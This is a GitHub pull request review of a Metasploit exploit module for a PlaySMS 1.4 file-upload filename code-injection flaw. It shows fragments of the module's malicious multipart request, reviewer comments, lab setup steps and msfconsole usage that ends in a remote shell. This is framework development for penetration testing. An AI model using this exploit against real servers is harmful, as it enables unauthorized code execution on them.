New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
playsms_filename_exec.rb #9944
playsms_filename_exec.rb #9944
Conversation
PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
doc update
hey @bcoles , i have added Doc. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Review comments. Also, please change the indentation from 4 spaces to 2 spaces to follow the style guide.
'DarkS3curity' # Metasploit Module | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Add CVE reference
CVE-2017-9080
12. Do: `exploit` | ||
13. You should get a shell. | ||
|
||
## Options |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The Options
section can probably be removed in this case.
# setup POST request. | ||
post_data = Rex::MIME::Message.new | ||
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token | ||
post_data.add_part("agent22", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"") # payload |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can the data agent22
be randomized or is that required?
Same question for fncsv
.
post_data = Rex::MIME::Message.new | ||
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token | ||
post_data.add_part("agent22", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"") # payload | ||
post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"') # extra |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can fncsv_dup
be randomized?
post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"') # extra | ||
data = post_data.to_s | ||
|
||
print_status('Trying to upload file with malicious Filename Field....') |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Consider changing to vprint_status
.
hey @jrobles-r7, thanks for the review and giving suggestions. I have made changes according to your suggestions. 👍 |
Release NotesThe PlaySMS module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload. |
Description
this Module exploits a Authenticated File Upload and In filename parameter have Remote Code Excution Vulnerability in PlaySMS Version 1.4. This issue is caused by improper File name handling in sendfromfile.php file. Authenticated Users can upload a file and rename file name with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB 42044)
NOTE : This Module is already PULLED but for some reason closed by author Check #9840
Vulnerable Application
Available at Exploit-DB
Vulnerable Application Installation Setup.
Download Application :
wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
Extract :
tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
Move In WebDirectory :
mv playsms-1.4/web/* /var/www/html/
make config file:
cp /var/www/html/config-dist.php /var/www/html/config.php
Change Owner :
chown -R www-data:www-data /var/www/html/
Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.
Now Visit : http://localhost/
Verification Steps
use exploit/multi/http/playsms_filename_exec
set rport <port>
set rhost <ip>
set targeturi SecreTSMSgatwayLogin
set username touhid
set password diana
check
set lport <port>
set lhost <ip>
exploit
Scenarios
Playsms on Ubuntu Linux